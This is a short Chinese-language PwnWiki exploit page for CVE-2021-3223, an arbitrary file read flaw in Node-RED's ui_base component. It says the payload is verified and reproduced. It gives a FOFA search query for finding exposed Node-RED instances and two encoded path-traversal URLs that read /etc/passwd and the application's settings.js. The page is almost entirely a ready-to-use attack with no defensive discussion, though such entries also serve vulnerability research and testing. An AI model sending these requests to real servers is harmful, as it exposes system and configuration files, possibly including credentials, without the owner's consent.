CVE-2021-3223 Node-RED ui base 任意文件读取漏洞

From PwnWiki
This page is a translated version of the page CVE-2021-3223 Node-RED ui base 任意文件讀取漏洞 and the translation is 100% complete.
Other languages:
Chinese • ‎English • ‎中文(中国大陆)‎


Check.png 该漏洞已通过验证

本页面的EXP/POC/Payload经测试可用,漏洞已经成功复现。

漏洞影响

Node-RED

FOFA

title="Node-RED"

POC

/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/ui_base/js/..%2f..%2f..%2f..%2fsettings.js